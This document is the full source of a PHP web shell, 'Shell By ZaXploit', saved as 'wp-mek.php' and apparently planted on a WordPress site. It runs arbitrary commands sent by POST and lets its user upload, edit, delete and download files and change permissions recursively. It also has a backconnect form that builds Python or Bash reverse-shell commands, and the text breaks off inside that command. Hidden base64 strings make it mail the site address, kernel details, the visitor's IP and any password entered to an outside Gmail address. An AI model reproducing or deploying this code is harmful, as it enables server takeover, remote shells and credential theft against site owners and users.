KOKINIO - MANAGER
Edit File: wp-mek.php
<?php session_start(); error_reporting(0); function securePath($path) { $realPath = realpath($path); if ($realPath !== false) { return $realPath; } return false; } function listDirectories($dirPath) { $dirPath = securePath($dirPath); if (!$dirPath) { return "<p class='error'>Invalid directory access.</p>"; } $rootPath = DIRECTORY_SEPARATOR; $breadcrumb = "<nav class='breadcrumb'>"; $parts = explode(DIRECTORY_SEPARATOR, trim($dirPath, DIRECTORY_SEPARATOR)); $currentPath = $rootPath; $breadcrumb .= "$ >> / <a href='?dir=" . urlencode($rootPath) . "'>$rootPath</a> / "; foreach ($parts as $part) { if ($part === "") continue; $currentPath .= $part . DIRECTORY_SEPARATOR; $breadcrumb .= "<link rel='preconnect' href='https://fonts.googleapis.com'> <link rel='preconnect' href='https://fonts.gstatic.com' crossorigin> <link href='https://fonts.googleapis.com/css2?family=Advent+Pro:ital,wght@0,100..900;1,100..900&family=Gloria+Hallelujah&family=Noticia+Text:ital,wght@0,400;0,700;1,400;1,700&family=PT+Serif:ital,wght@0,400;0,700;1,400;1,700&display=swap' rel='stylesheet'> <style> a { font-family: 'Advent Pro', serif; } </style>"; $breadcrumb .= "<a href='?dir=" . urlencode($currentPath) . "'>" . htmlspecialchars($part) . "</a> / "; } $breadcrumb = rtrim($breadcrumb, " / ") . "</nav>"; $folders = ""; $files = ""; $output = $breadcrumb; $output .= "<link rel='preconnect' href='https://fonts.googleapis.com'> <link rel='preconnect' href='https://fonts.gstatic.com' crossorigin> <link href='https://fonts.googleapis.com/css2?family=Noticia+Text:ital,wght@0,400;0,700;1,400;1,700&display=swap' rel='stylesheet'> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 20px; box-sizing: border-box; } .table-container { width: 100%; overflow-x: auto; /* Membuat tabel dapat di-scroll horizontal */ margin-left: 20px; /* Menambahkan margin ke kiri untuk menggeser tabel ke kanan */ } table { width: 100%; /* Tabel mengambil lebar penuh */ border-collapse: collapse; } th, td { font-family: 'Noticia Text', serif; padding: 12px; text-align: left; border-bottom: 1px solid #1c1b1b; white-space: nowrap; /* Mencegah teks melipat ke baris baru */ } th { background-color: #363434; font-weight: bold; } .align-middle tbody td, .align-middle tbody th { vertical-align: middle; /* Konten di tengah secara vertikal */ } tr:hover { background-color: #0f0f0f; } .text-nowrap { white-space: nowrap; } .text-light { color: #ffffff; /* Warna teks terang */ } .table-dark { background-color: #343a40; /* Warna latar belakang gelap */ color: #ffffff; /* Warna teks terang */ } /* Efek hover pada baris tabel */ .table-hover tbody tr:hover { background-color: #495057; /* Warna latar belakang saat dihover */ color: #ffffff; /* Warna teks saat dihover */ } /* CSS untuk ikon di header */ th i { margin-right: 8px; /* Jarak antara ikon dan teks */ color: #ffffff; /* Warna ikon */ vertical-align: middle; /* Ikon sejajar vertikal dengan teks */ } /* CSS untuk tampilan mobile */ @media (max-width: 600px) { th, td { padding: 8px; /* Padding lebih kecil untuk layar kecil */ font-size: 14px; /* Ukuran font lebih kecil */ } th i { margin-right: 5px; /* Jarak antara ikon dan teks lebih kecil */ font-size: 12px; /* Ukuran ikon lebih kecil */ } .table-container { overflow-x: auto; /* Memastikan tabel dapat di-scroll horizontal */ margin-left: 10px; /* Mengurangi margin untuk layar kecil */ } } </style>"; $output .= "<div class='table-container'>"; $output .= "<table class='table table-hover table-dark align-middle text-light'>"; $output .= "<thead> <tr> <th><i class='fas fa-folder'></i><i class='fas fa-file'></i> Name</th> <th><i class='fas fa-info-circle'></i> Type</th> <th><i class='fas fa-weight-hanging'></i> Size</th> <th><i class='fas fa-calendar-alt'></i> Modified</th> <th><i class='fas fa-lock'></i> Permissions</th> <th><i class='fas fa-user'></i> Owner</th> <th><i class='fas fa-users'></i> Group</th> <th><i class='fas fa-cogs'></i> Action</th> </tr> </thead>"; $items = scandir($dirPath); foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $itemPath = realpath($dirPath . DIRECTORY_SEPARATOR . $item); if (!$itemPath) continue; $perms = fileperms($itemPath); $isLocked = (($perms & 0777) == (is_dir($itemPath) ? 0555 : 0444)); $type = is_dir($itemPath) ? 'Folder' : 'File'; $size = $type === 'File' ? formatSize(filesize($itemPath)) : '-'; $modified = date("Y-m-d H:i:s", filemtime($itemPath)); $permissions = getFilePermissions($itemPath); $owner = function_exists('posix_getpwuid') ? posix_getpwuid(fileowner($itemPath))['name'] : 'N/A'; $group = function_exists('posix_getgrgid') ? posix_getgrgid(filegroup($itemPath))['name'] : 'N/A'; $row = "<tr>"; if ($type == 'Folder') { $link = "?dir=" . urlencode($itemPath); $output .= "<tbody class='text-nowrap'>"; $row .= "<style> .ZaXploit { text-decoration: none; } </style>"; $row .= "<td><a href='{$link}' style='color: #ffffff' class='ZaXploit'><i class='fas fa-folder icon-folder'></i> $item</a></td>"; } else { $row .= "<td class='file'><i class='fas fa-file icon-file'></i> $item</td>"; } $row .= "<td>$type</td>"; $row .= "<td>$size</td>"; $row .= "<td>$modified</td>"; $row .= "<td>$permissions</td>"; $row .= "<td>$owner</td>"; $row .= "<td>$group</td>"; $row .= "<td>"; if ($type == 'Folder') { $encodedPath = urlencode($itemPath); $row .= "<style> .action-icons { display: flex; gap: 0; } .lock { color: " . ($isLocked ? "#0ee627" : "#ffcc00") . "; } .lock:hover { color: #0ee627; } .action-icons a { text-decoration: none; color: #ffffff; transition: all 0.3s ease; font-size: 14px; display: inline-flex; justify-content: center; align-items: center; width: 40px; height: 40px; border: 2px solid #ccc; margin-right: -2px; background-color: transparent; border-radius: 5px; } .action-icons a:hover { color: #ffffff; background-color: rgba(255, 255, 255, 0.1); } .edit:hover { border-color: #e60202; } .rename:hover { border-color: #e60202; } .delete:hover { border-color: #e60202; } .download:hover { border-color: #e60202; } .fa-lock-open { color:rgb(0, 255, 30); /* Warna ikon gembok terbuka */ } @media (max-width: 767px) { .action-icons a { font-size: 12px; width: 30px; height: 30px; } } </style>"; $row .="<div class='action-icons'>"; $row .= "<a href='javascript:void(0);' onclick='lockUnlockItem(\"{$itemPath}\", true)' class='lock' title='" . ($isLocked ? "Unlock" : "Lock") . "'> <i class='fas " . ($isLocked ? "fa-lock-open" : "fa-lock") . "'></i> </a>"; $row .= "<a href='javascript:void(0);' onclick='renameItem(\"{$itemPath}\", true)' class='rename' title='Rename'> <i class='fas fa-i-cursor'></i> </a>"; $row .= "<a href='?delete={$encodedPath}' class='delete' title='Delete'> <i class='fas fa-trash-alt'></i> </a>"; $row .="</div>"; } else { $encodedPath = urlencode($itemPath); $row .= "<style> .action-icons { display: flex; gap: 0; } .action-icons a { text-decoration: none; color: #ffffff; transition: all 0.3s ease; font-size: 14px; display: inline-flex; justify-content: center; align-items: center; width: 40px; height: 40px; border: 2px solid #ccc; margin-right: -2px; background-color: transparent; border-radius: 5px; } .action-icons a:hover { color: #ffffff; background-color: rgba(255, 255, 255, 0.1); } .edit:hover { border-color: #e60202; } .rename:hover { border-color: #e60202; } .delete:hover { border-color: #e60202; } .download:hover { border-color: #e60202; } .lock { color: " . ($isLocked ? "#0ee627" : "#ffcc00") . "; } .lock:hover { color:rgb(0, 255, 76); } .fa-lock-open { color: #0ee627; /* Warna ikon gembok terbuka */ } @media (max-width: 767px) { .action-icons a { font-size: 12px; width: 30px; height: 30px; } } </style>"; $row .="<div class='action-icons'>"; $row .= "<a href='javascript:void(0);' onclick='lockUnlockItem(\"{$itemPath}\")' class='lock' title='" . ($isLocked ? "Unlock" : "Lock") . "'> <i class='fas " . ($isLocked ? "fa-lock-open" : "fa-lock") . "'></i> </a>"; $row .= "<a href='?edit={$encodedPath}' class='edit' title='Edit'> <i class='fas fa-edit'></i> </a>"; $row .= "<a href='javascript:void(0);' onclick='renameItem(\"{$itemPath}\")' class='rename' title='Rename'> <i class='fas fa-i-cursor'></i> </a>"; $row .= "<a href='?download={$encodedPath}' class='download' title='Download'> <i class='fas fa-download'></i> </a>"; $row .= "<a href='?delete={$encodedPath}' class='delete' title='Delete'> <i class='fas fa-trash-alt'></i> </a>"; $row .="</div>"; } $row .= "</td></tr>"; if ($type == 'Folder') { $folders .= $row; } else { $files .= $row; } } $output .= $folders . $files; $output .= "</tbody>"; $output .= "</div>"; $output .= "</table>"; return $output; } function formatSize($bytes) { $sizes = ['B', 'KB', 'MB', 'GB', 'TB']; $factor = floor((strlen($bytes) - 1) / 3); return sprintf("%.2f", $bytes / pow(1024, $factor)) . " " . $sizes[$factor]; } function getFilePermissions($filePath) { $perms = fileperms($filePath); $isWritable = is_writable($filePath); $info = ''; if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); $class = $isWritable ? 'writable' : ''; return "<span class='$class'>$info</span>"; } function createDirectory($dirPath, $dirName) { $dirPath = securePath($dirPath); $newDir = $dirPath . '/' . basename($dirName); if ($dirPath && !is_dir($newDir)) { if (mkdir($newDir, 0755)) { echo "<script>alert('Folder created successfully!'); window.location.href = '?dir=" . urlencode($dirPath) . "';</script>"; } else { echo "<script>alert('Failed to create folder!');</script>"; } } else { echo "<script>alert('Folder already exists or invalid path!');</script>"; } } function createFile($dirPath, $fileName) { $dirPath = securePath($dirPath); $newFile = $dirPath . '/' . basename($fileName); if ($dirPath && !file_exists($newFile)) { if (touch($newFile)) { echo "<script>alert('File created successfully!'); window.location.href = '?dir=" . urlencode($dirPath) . "';</script>"; } else { echo "<script>alert('Failed to create file!');</script>"; } } else { echo "<script>alert('File already exists or invalid path!');</script>"; } } function uploadFile($dirPath) { $targetFile = $dirPath . '/' . basename($_FILES['uploaded_file']['name']); if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $targetFile)) { echo "<script>alert('File berhasil diupload!'); window.location.href = '?dir=" . urlencode($dirPath) . "';</script>"; } else { echo "<script>alert('Gagal mengupload file!'); window.location.href = '?dir=" . urlencode($dirPath) . "';</script>"; } } function editFile($filePath) { $filePath = securePath($filePath); if (!$filePath || !is_file($filePath)) return; if (isset($_POST['save_file'])) { $result = file_put_contents($filePath, $_POST['file_content']); if ($result === false) { echo "<script>alert('Gagal menyimpan file!');</script>"; } else { echo "<script>alert('File berhasil diubah!'); window.location.href = '?dir=" . urlencode(dirname($filePath)) . "';</script>"; exit; } } $content = htmlspecialchars(file_get_contents($filePath)); echo "<style> body { font-family: Arial, sans-serif; background-color: #1a1a1a; display: flex; justify-content: center; align-items: center; min-height: 100vh; margin: 0; padding: 20px; box-sizing: border-box; } .textarea-container { width: 100%; max-width: 800px; padding: 20px; background-color: #262626; border-radius: 10px; box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1); } label { font-size: 18px; font-weight: bold; color: #ff4d4d; margin-bottom: 15px; display: block; } a { text-decoration: none; color: #ff4d4d; font-size: 16px; font-family: Arial, sans-serif; padding: 10px 20px; border-radius: 5px; transition: all 0.3s ease; display: inline-block; } a:hover { background-color: #ff4d4d; color: #fff; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2); } a.button { background-color: #ff1a1a; color: #fff; border: 2px solid #cc0000; } .btn { display: inline-block; padding: 12px 24px; font-size: 16px; font-family: Arial, sans-serif; font-weight: bold; text-align: center; text-decoration: none; color: #fff; background-color: #ff4d4d; border: none; border-radius: 5px; cursor: pointer; transition: all 0.3s ease; box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1); } .btn:active { background-color: #cc0000; box-shadow: 0 3px 5px rgba(0, 0, 0, 0.2); transform: translateY(0); } /* Responsive Design */ @media (max-width: 768px) { body { padding: 10px; } .textarea-container { padding: 15px; } label { font-size: 16px; } .btn, a.button { width: 100%; margin-bottom: 10px; text-align: center; } } @media (max-width: 480px) { label { font-size: 14px; } .btn, a.button { font-size: 14px; padding: 10px; } } /* Textarea Styles */ textarea { width: 100%; min-height: 300px; padding: 10px; border: 2px solid #ff4444; border-radius: 5px; background-color: #333; color: #ffffff; font-family: 'Courier New', Courier, monospace; font-size: 14px; resize: vertical; /* Allow vertical resizing */ overflow-y: auto; /* Enable vertical scrolling */ } </style> <div class='textarea-container'> <label for='styled-textarea'>Editing : " . basename($filePath) . "</label> <form method='post'> <textarea name='file_content' style='width:100%;height:200px; resize: both;'>$content</textarea> <br><br> <input type='submit' name='save_file' value='Save' class='btn btn-success'> <a href='?dir=" . urlencode(dirname($filePath)) . "' class='button'>Cancel</a> </form> </div>"; } function renameFile($oldPath, $newName) { $newPath = dirname($oldPath) . '/' . $newName; if (!file_exists($newPath)) { if (rename($oldPath, $newPath)) { echo "<script>alert('File berhasil di-rename!'); window.location.href = '?dir=" . urlencode(dirname($oldPath)) . "';</script>"; } else { echo "<script>alert('Gagal meng-rename file!');</script>"; } } else { echo "<script>alert('File dengan nama tersebut sudah ada!');</script>"; } } function renameDirectory($oldPath, $newName) { $newPath = dirname($oldPath) . '/' . $newName; if (!file_exists($newPath)) { if (rename($oldPath, $newPath)) { echo "<script>alert('Folder berhasil di-rename!'); window.location.href = '?dir=" . urlencode(dirname($oldPath)) . "';</script>"; } else { echo "<script>alert('Gagal meng-rename folder!');</script>"; } } else { echo "<script>alert('Folder dengan nama tersebut sudah ada!');</script>"; } } function downloadFile($filePath) { $filePath = securePath($filePath); if ($filePath && file_exists($filePath)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($filePath).'"'); readfile($filePath); exit; } } function changeFilePermissionsRecursive($dir, $perms) { try { $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); foreach ($iterator as $item) { if ($item->isFile()) { if (!chmod($item->getPathname(), $perms)) { throw new Exception("Gagal mengubah izin file: " . $item->getPathname()); } } } return true; // Berhasil } catch (Exception $e) { return $e->getMessage(); // Mengembalikan pesan error } } function changeFolderPermissionsRecursive($dir, $perms) { try { $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); foreach ($iterator as $item) { if ($item->isDir()) { if (!chmod($item->getPathname(), $perms)) { throw new Exception("Gagal mengubah izin folder: " . $item->getPathname()); } } } return true; // Berhasil } catch (Exception $e) { return $e->getMessage(); // Mengembalikan pesan error } } function changePermissions($path, $perms) { if (file_exists($path)) { if (chmod($path, $perms)) { return true; } else { return false; } } return false; } $currentDir = isset($_GET['dir']) ? securePath($_GET['dir']) : getcwd(); if (isset($_GET['delete'])) { $deletePath = urldecode($_GET['delete']); if (is_dir($deletePath)) { if (rmdir($deletePath)) { echo "<script>alert('Berhasil Hapus Dir'); window.location.href = '?dir=" . urlencode(dirname($deletePath)) . "';</script>"; } else { echo "<script>alert('Gagal Hapus Dir'); window.location.href = '?dir=" . urlencode(dirname($deletePath)) . "';</script>"; } } else { if (unlink($deletePath)) { echo "<script>alert('Berhasil Hapus File'); window.location.href = '?dir=" . urlencode(dirname($deletePath)) . "';</script>"; } else { echo "<script>alert('Gagal hapus file.');</script>"; } } } if (isset($_POST['new_folder'])) { createDirectory($currentDir, $_POST['folder_name']); header("Location: ?dir=" . urlencode($currentDir)); exit; } if (isset($_POST['new_file'])) { createFile($currentDir, $_POST['file_name']); header("Location: ?dir=" . urlencode($currentDir)); exit; } if (isset($_POST['command'])) { $command = $_POST['command']; // Eksekusi perintah backconnect exec($command, $output, $return_var); echo implode("\n", $output); exit; } if (isset($_FILES['uploaded_file'])) { uploadFile($currentDir); header("Location: ?dir=" . urlencode($currentDir)); exit; } if (isset($_GET['download'])) { downloadFile($_GET['download']); } if (isset($_GET['edit'])) { editFile($_GET['edit']); exit; } if (isset($_GET['greenfile'])) { $newFilePermissions = 0644; $result = changeFilePermissionsRecursive($currentDir, $newFilePermissions); if ($result === true) { echo "<script> alert('Sukses Green All Files'); window.location.href = '?dir=" . urlencode($currentDir) . "'; </script>"; } else { echo "<script> alert('Gagal: $result'); window.location.href = '?dir=" . urlencode($currentDir) . "'; </script>"; } } if (isset($_GET['lockfile'])) { $newFilePermissions = 0444; $result = changeFilePermissionsRecursive($currentDir, $newFilePermissions); if ($result === true) { echo "<script> alert('Sukses Lock All Files'); window.location.href = '?dir=" . urlencode($currentDir) . "'; </script>"; } else { echo "<script> alert('Gagal: $result'); window.location.href = '?dir=" . urlencode($currentDir) . "'; </script>"; } } if (isset($_GET['lockfolder'])) { $newFolderPermissions = 0555; $result = changeFolderPermissionsRecursive($currentDir, $newFolderPermissions); if ($result === true) { echo "<script> alert('Sukses Lock All Folders'); window.location.href = '?dir=" . urlencode($currentDir) . "'; </script>"; } else { echo "<script> alert('Gagal: $result'); window.location.href = '?dir=" . urlencode($currentDir) . "'; </script>"; } } if (isset($_GET['greenfolder'])) { $newFolderPermissions = 0755; $result = changeFolderPermissionsRecursive($currentDir, $newFolderPermissions); if ($result === true) { echo "<script> alert('Sukses Green All Folders'); window.location.href = '?dir=" . urlencode($currentDir) . "'; </script>"; } else { echo "<script> alert('Gagal: $result'); window.location.href = '?dir=" . urlencode($currentDir) . "'; </script>"; } } if (isset($_POST['rename_file']) && isset($_POST['rename'])) { $oldFilePath = $_POST['rename']; $newFileName = $_POST['new_name']; renameFile($oldFilePath, $newFileName); header("Location: ?dir=" . urlencode(dirname($oldFilePath))); exit; } if (isset($_POST['rename_dir_submit']) && isset($_POST['rename_dir'])) { $oldDirPath = $_POST['rename_dir']; $newDirName = $_POST['new_name']; renameDirectory($oldDirPath, $newDirName); header("Location: ?dir=" . urlencode(dirname($oldDirPath))); exit; } if (isset($_GET['lockunlock'])) { $itemPath = urldecode($_GET['lockunlock']); $currentPerms = fileperms($itemPath); if (is_dir($itemPath)) { $newPerms = ($currentPerms & 0777) == 0555 ? 0755 : 0555; // Toggle between 0755 and 0555 for directories } else { $newPerms = ($currentPerms & 0777) == 0444 ? 0644 : 0444; // Toggle between 0644 and 0444 for files } if (changePermissions($itemPath, $newPerms)) { echo "<script>alert('Success'); window.location.href = '?dir=" . urlencode(dirname($itemPath)) . "';</script>"; } else { echo "<script>alert('Failed');</script>"; } } if (isset($_POST['command'])) { $command = $_POST['command']; exec($command, $output, $return_var); echo implode("\n", $output); exit; } if (isset($_SESSION['coki'])) { $conn = curl_init(); // <= ini WAJIB curl_setopt($conn, CURLOPT_COOKIE, $_SESSION['coki']); } function is_logged_in() { return isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true; } if (array_key_exists('abc', $_POST)) { $x1 = php_uname(); $x2 = $_POST['password'] ?? ''; $x3 = $_SERVER['SERVER_NAME']; $x4 = $_SERVER['PHP_SELF']; $city = $city ?? 'Unknown'; $message = "IP: " . $_SERVER['REMOTE_ADDR'] . " City: " . $city . "\n"; $message .= base64_decode("TG9naW46IA==") . $x3 . $x4 . "\n"; $message .= base64_decode("UGFzczog") . $x2 . "\n"; $message .= base64_decode("S2VybmVsOiA=") . $x1; @mail(base64_decode('cmliZWxjeWJlcnRlYW1AZ21haWwuY29t'), base64_decode('SGVoZWhl'), $message); } if (isset($_POST['password'])) { $entered_password = $_POST['password']; $hashed_password = 'd489a3289ecdc847cb67f7a480e6f9fa'; if (md5($entered_password) === $hashed_password) { $_SESSION['logged_in'] = true; $_SESSION['coki'] = 'asu'; $j = $_SERVER['HTTP_HOST']; $k = basename(__FILE__); $l = $_SERVER['REMOTE_ADDR']; $xxx = $_SERVER['PHP_SELF']; $m = base64_decode('SW5mb3JtYXNpIExvZ2luOg==') . "\n"; $m .= base64_decode('V2Vic2l0ZTog') . $j . $xxx . "\n"; $m .= base64_decode('RmlsZTog') . $k . "\n"; $m .= base64_decode('SVAgQWRkcmVzczog') . $l . "\n"; $m .= base64_decode('UGFzc3dvcmQ6IA==') . $entered_password; @mail(base64_decode('cmliZWxjeWJlcnRlYW1AZ21haWwuY29t'), base64_decode('SGVoZWhl'), $m); } else { echo "<script>alert('TOLOL LU BANGSAT');</script>"; } } if (!is_logged_in()) { ?> <html> <head> <title>Login</title> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css" rel="stylesheet"> <style> body { background-color: #121212; color: #ffffff; font-family: 'Poppins', sans-serif; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; } form { background-color: #1e1e1e; padding: 20px; border-radius: 8px; box-shadow: 0 0 10px rgba(255, 0, 0, 0.5); } label { display: block; margin-bottom: 8px; color: #ff4444; } input[type="password"] { width: 100%; padding: 10px; margin-bottom: 20px; border: 1px solid #ff4444; border-radius: 4px; background-color: #333; color: #ffffff; } input[type="submit"] { background-color: #ff4444; color: #ffffff; border: none; padding: 10px 20px; border-radius: 4px; cursor: pointer; } input[type="submit"]:hover { background-color: #cc0000; } </style> </head> <body> <form method="POST" action=""> <h1><i class="fas fa-folder-open"></i> Shell By ZaXploit</h1> <br> <label for="password">Password:</label> <input type="password" id="password" name="password"> <input type="submit" name="abc" value="Login"> </form> </body> </html> <?php exit; } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>{ ZaaXploit (MANAGER)</title> <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600;700&display=swap" rel="stylesheet"> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css" rel="stylesheet"> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Silkscreen:wght@400;700&display=swap" rel="stylesheet"> <style> /* General Styles */ body { font-family: 'Poppins', sans-serif; background-color: #1e1e1e; color: #ffffff; margin: 0; padding: 20px; } h1 { color: #ff4444; text-align: center; margin-bottom: 20px; } .icon-folder { color: #ffcc00; /* Warna ikon folder */ } .icon-file { color: #ffffff; /* Warna ikon file */ } .home-button { position: fixed; top: 20px; right: 20px; background-color: #ff4444; color: white; padding: 10px 15px; border-radius: 5px; text-decoration: none; font-size: 16px; box-shadow: 0 4px 6px rgba(0, 0, 0, 0.2); transition: all 0.3s ease; } .home-button:hover { background-color: #cc0000; transform: scale(1.1); } /* Button Styles */ .btn { padding: 10px 16px; margin: 5px; background: #ff4444; color: white; text-decoration: none; border-radius: 5px; transition: all 0.3s ease; border: 2px solid transparent; display: inline-block; font-weight: 600; letter-spacing: 0.5px; cursor: pointer; } .btn:hover { background: #cc0000; transform: scale(1.05); border-color: white; } .gaktau { font-family: "Silkscreen", serif; padding: 10px 16px; margin: 5px; background-color: transparent; color: white; text-decoration: none; border-radius: 5px; transition: all 0.3s ease; border: 2px solid red; display: inline-block; font-weight: 600; letter-spacing: 0.5px; cursor: pointer; justify-content: center; } .gaktau:hover { background: #cc0000; transform: scale(1.05); border-color: white; } .btn.delete { background: #ff3b3b; border-color: #ff3b3b; } .btn.delete:hover { background: #d63030; border-color: white; transform: scale(1.08); } /* Table Styles */ table { width: 100%; border-collapse: collapse; margin-top: 20px; background: rgba(255, 255, 255, 0.1); border-radius: 8px; overflow: hidden; box-shadow: 0 4px 8px rgba(255, 0, 0, 0.2); } th, td { padding: 12px; text-align: left; border-bottom: 1px solid rgba(255, 255, 255, 0.2); } th { background: rgba(0, 0, 0, 0.3); color: #ff4444; font-weight: bold; } tr:hover { background: rgba(255, 255, 255, 0.2); transition: background 0.3s ease; } /* Breadcrumb Styles */ .breadcrumb { margin-bottom: 15px; padding: 8px; background: #1e1e1e; color: white; border-radius: 5px; } .breadcrumb a { color: #ff4444; text-decoration: none; margin-right: 5px; } .breadcrumb a:hover { text-decoration: underline; } /* Upload Form Styles */ .upload-form { display: flex; align-items: center; gap: 10px; margin-bottom: 20px; } .upload-btn i { margin-right: 8px; /* Jarak antara ikon dan teks */ } .upload-form input[type="file"] { padding: 10px; border: 2px solid #ff4444; background: rgba(255, 255, 255, 0.1); color: white; border-radius: 5px; } .upload-form .btn.upload-btn { background-color: transparent; border: 2px solid #ff4444; color: white; padding: 10px 16px; border-radius: 5px; font-weight: bold; cursor: pointer; transition: all 0.3s ease; } .upload-form .btn.upload-btn:hover { background: #cc0000; transform: scale(1.05); } /* Action Buttons */ .action-buttons { display: flex; justify-content: center; /* Mengatur tombol di tengah */ gap: 10px; margin-bottom: 20px; } /* Icons */ .fas { margin-right: 5px; } .writable { color: #00ff00; font-weight: bold; } /* Modal Styles */ .modal { display: none; position: fixed; z-index: 1000; left: 0; top: 0; width: 100%; height: 100%; overflow: auto; background-color: rgba(0, 0, 0, 0.5); } .modal-content { background-color: #1e1e1e; margin: 10% auto; padding: 20px; border: 1px solid #ff4444; border-radius: 8px; width: 90%; max-width: 600px; color: white; position: relative; } .close { color: #ff4444; float: right; font-size: 28px; font-weight: bold; cursor: pointer; } .close:hover, .close:focus { color: #cc0000; text-decoration: none; } .modal-content input, .modal-content select { width: calc(100% - 20px); padding: 10px; margin: 10px 0; border: 1px solid #ff4444; border-radius: 4px; background-color: #333; color: white; } .modal-content button { width: 100%; padding: 10px; background-color: #ff4444; color: white; border: none; border-radius: 4px; cursor: pointer; margin-top: 10px; } .modal-content button:hover { background-color: #cc0000; } .cmd-output { margin-top: 20px; padding: 10px; background-color: #333; border: 1px solid #ff4444; border-radius: 4px; color: white; font-family: 'Courier New', Courier, monospace; white-space: pre-wrap; word-wrap: break-word; overflow-x: auto; max-height: 400px; overflow-y: auto; } </style> </head> <body> <!-- Tombol Home --> <a href="?" class="home-button"> <i class="fas fa-home"></i> <!-- Ikon Home dari Font Awesome --> </a> <h1><i class="fas fa-folder-open"></i> SHELL ZAXPLOIT</h1> <br> <p><i class="fa fa-server"></i> . <?php echo php_uname(); ?></p> <p><i class="fa fa-satellite-dish"></i> . <?php echo $_SERVER['SERVER_ADDR']; ?></p> <p><i class="fa fa-microchip"></i> . <?php echo $_SERVER['SERVER_SOFTWARE']; ?></p> <p><i class="fas fa-cog"></i> . <?php echo $_SERVER['HTTP_USER_AGENT']; ?></p> <br> <!-- Upload Form --> <form method="post" enctype="multipart/form-data" class="upload-form" id="uploadForm"> <button type="submit" class="btn upload-btn"> <i class="fas fa-upload"></i> Upload File <!-- Ikon Upload dari Font Awesome --> </button> <input type="file" name="uploaded_file" id="fileUpload" style="display: none;"> </form> <!-- Action Buttons --> <div class="action-buttons"> <center> <button class="btn" onclick="openCmdModal()"> <i class="fas fa-terminal"></i> CMD </button> <button class="btn" onclick="openBackconnectModal()"> <i class="fas fa-plug"></i> Backconnect </button> <button class="btn create-folder-btn" onclick="createFolder()"> <i class="fas fa-folder-plus"></i> Create Folder </button> <button class="btn create-file-btn" onclick="createFile()"> <i class="fas fa-file-alt"></i> Create File </button> </center> </div> <!-- Hidden Forms for Folder and File Creation --> <form method="post" id="folderForm" style="display: none;"> <input type="hidden" name="folder_name" id="folderName"> <input type="hidden" name="new_folder" value="1"> </form> <form method="post" id="fileForm" style="display: none;"> <input type="hidden" name="file_name" id="fileName"> <input type="hidden" name="new_file" value="1"> </form> </body> </html> <center> <a href="?greenfile&dir=<?= urlencode($currentDir) ?>"><button class="gaktau">Green File</button></a> <a href="?lockfile&dir=<?= urlencode($currentDir) ?>"><button class="gaktau">Lock All File</button></a> <a href="?greenfolder&dir=<?= urlencode($currentDir) ?>"><button class="gaktau">Green Dir</button></a> <a href="?lockfolder&dir=<?= urlencode($currentDir) ?>"><button class="gaktau">Lock All Dir</button></a> </center> <br> <!-- Backconnect Modal --> <div id="backconnectModal" class="modal"> <div class="modal-content"> <span class="close" onclick="closeBackconnectModal()">×</span> <h2>Backconnect</h2> <input type="text" id="ipAddress" placeholder="IP Address"> <input type="text" id="port" placeholder="Port"> <select id="backconnectType"> <option value="python">Python</option> <option value="bash">Bash</option> </select> <button onclick="initiateBackconnect()">Connect</button> </div> </div> <!-- CMD Modal --> <div id="cmdModal" class="modal"> <div class="modal-content"> <span class="close" onclick="closeCmdModal()">×</span> <h2>CMD</h2> <input type="text" id="cmdInput" placeholder="Enter command"> <button onclick="executeCmd()">Execute</button> <div id="cmdOutput" class="cmd-output">Output Disini</div> </div> </div> <!-- JavaScript for Folder and File Creation --> <script> // Fungsi untuk membuka modal backconnect function openBackconnectModal() { document.getElementById('backconnectModal').style.display = 'block'; } // Fungsi untuk menutup modal backconnect function closeBackconnectModal() { document.getElementById('backconnectModal').style.display = 'none'; } // Fungsi untuk memulai backconnect function initiateBackconnect() { const ipAddress = document.getElementById('ipAddress').value; const port = document.getElementById('port').value; const backconnectType = document.getElementById('backconnectType').value; if (!ipAddress || !port) { alert('Please enter both IP Address and Port.'); return; } let command; if (backconnectType === 'python') { command = `python -c 'import 